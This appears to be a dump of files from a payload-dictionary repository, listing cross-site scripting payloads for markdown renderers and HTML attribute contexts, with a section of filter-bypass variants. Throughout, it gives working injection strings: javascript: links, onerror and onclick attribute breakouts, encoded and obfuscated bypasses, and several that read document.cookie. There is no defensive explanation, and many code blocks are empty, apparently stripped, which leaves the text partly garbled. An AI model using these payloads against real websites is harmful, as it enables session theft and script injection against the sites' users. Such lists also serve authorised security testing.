[a](javascript://%0d%0aconfirm(1);com) [a](javascript:window.onerror=confirm;throw%201) [a](javascript:alert(document.domain)) [a](javascript://www.google.com%0Aalert(1)) [a]('javascript:alert("1")') [a](JaVaScRiPt:alert(1)) ![a](https://www.google.com/image.png"onload="alert(1)) ![a]("onerror="alert(1)) <\h1\>confirm(2) [XSS](.alert(1);) [ ](https://a.de?p=[[/data-x=. style=background-color:#000000;z-index:999;width:100%;position:fixed;top:0;left:0;right:0;bottom:0; data-y=.]]) [ ](http://a?p=[[/onclick=alert(0) .]]) ================================================ FILE: payload字典/xss跨站脚本相关字典/xss.md ================================================ ``` ``` ``` [a](javascript:prompt(document.cookie)) [a](j a v a s c r i p t:prompt(document.cookie)) ![a](javascript:prompt(document.cookie))\ ![a'"`onerror=prompt(document.cookie)](x)\ [citelol]: (javascript:prompt(document.cookie)) ``` ``` XSS ``` ``` 1 ``` ``` ``` ``` "> ``` ``` ' onclick=alert(1) ' onmouseover=alert(1) ``` ``` " onclick=alert(1) " onmouseover=alert(1) ``` ``` "> "> "> ">bmjoker "> "> ``` ```html ``` ================================================ FILE: payload字典/xss跨站脚本相关字典/一些bypass的xss-payload.md ================================================ xss bypass ``` ``` ```

``` ``` "%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F ``` ``` ">> CSS< ``` ``` < a href="/*">*/)}); function+__MobileAppList(){alert(1)}//> ``` ``` ``` ``` jaVasCript:/*-/*`/*\`/*'/*"/**/(/**/oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e ``` ``` %22%3E%3Casuka%20AutoFocus%20ContentEditable%20OnFocusIn%3D_%3Dalert%2C_%28document.cookie%29%3E ``` ``` [email]a@a.a?[email=a@a.a?onmouseover=alert(1) a]a[/email][/email] ``` ``` \"+confirm(1)+" ``` ```

XSS

XSS

XSS

XSS ``` ``` onMouseOver=

``` ``` ``` ```

d

d ``` ```